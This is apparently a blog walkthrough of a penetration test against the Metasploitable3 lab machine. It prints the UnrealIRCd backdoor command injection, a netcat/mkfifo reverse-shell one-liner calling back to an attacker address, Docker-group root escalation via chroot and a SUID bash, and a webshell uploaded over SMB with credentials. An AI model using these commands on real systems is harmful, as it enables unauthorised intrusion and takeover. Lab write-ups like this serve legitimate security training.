Penetration Testing

Metasploitable3 Walkthrough: Penetration Testing (Part 2)

By SecureLayer7 Lab

3 min read

Metasploitable Walkthrough - Part 2

Introduction

In the previous part, we covered network discovery and began exploiting the FTP service and web applications running on port 80. In this part, we will continue by gaining remote code execution and exploring further vulnerabilities.

We start with Nmap scanning, and in this section, we will exploit the UnrealIRCd service and SMB.

Nmap scanning

Unreal IRC Service 6697

With the Metasploit

While searching for any public exploit Metasploit have already a module for this service and the vulnerability in UnrealIRCd service file in the mirror (Unreal3.2.8.1.tar.gz) was replaced by adding a malicious version with a backdoor allows a person to execute an ANY command with the privileges of the user running the ircd in November 2009.

Exploitation is straightforward – by setting the RHOST, selecting a payload (cmd/unix/reverse_prel), defining the target port 6697, and setting LHOST to 10.0.2.15, we obtain a command execution shell.

Unreal IRC Service 6697

Now, we have a command execution shell.

According to the exploit on the Metasploit module, the exploit was targeting to connect to the service and then using AB; which is implemented in the backdoor to redirect everything coming after it to the system and then `AB; + the payload to reverse the shell.

Let’s try it manually by running the command AB; mkdir /tmp/pwn;

Terminal output of command injection payload running mkdir /tmp/pwn to create a directory

As we can see, the directory has been successfully created.

Terminal confirming the /tmp/pwn directory was created successfully via injected command

For taking reverse shell, we can use the same command as AB; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc IP_ADDRES PORT >/tmp/f 


Privilege Escalation

After the reverse shell, we now have a stable shell and boba_fett is one of the docker groups which means it has access on docker without having to be in the the sudo group.

Reverse shell as boba_fett showing membership in the docker group for privilege escalation

So, running docker images to list the installed images was Ubuntu one of the installed images which make the escalation a pace of cake.

docker images output listing the Ubuntu image available for container privilege escalation

`docker run -v /:/mnt –rm -it ubuntu chroot /mnt /bin/bash` by Mounting / in the Docker container and using `chroot` to give the full root access to the host system, allowing to write on the host files.

As you see in the picture, we can see the host files mounted as the root directory of the container.

Docker container with host filesystem mounted via chroot, showing host root directory files

Setting /bin/bash to sets the SUID by chomd u+s /bin/bash to run it as a root.

Setting the SUID bit on /bin/bash with chmod u+s to run it as root

After running it with the -p option to enable privileged mode and prevent dropping permissions, we now have the effective user ID (EUID) of root, 

As shown in the image below;

Running bash -p to gain an effective user ID of root after setting the SUID bit

Samba 445

Under the /uploads/

Samba enumeration on port 445 listing the uploads share contents

The Chewbacca user has access to the /var/www/html

To get the reverse shell, we need to edit these parts the IP and port places of the webshell.

Editing the webshell to set the attacker IP and port for the reverse shell

Smbclient //10.0.2.15/public -U chewbacca%rwaaaawr5 to connect the smb and then upload the

smbclient connecting to the public share as chewbacca to upload the webshell

they used web shell resources

Loading the web shell using the curl command to receive the reverse shell 

Loading the uploaded web shell with curl to trigger the reverse shell

Then, listening on the specified port (in my case, 1234), and now we have a reverse shell

Netcat listener on port 1234 receiving the incoming reverse shell connection

Resources: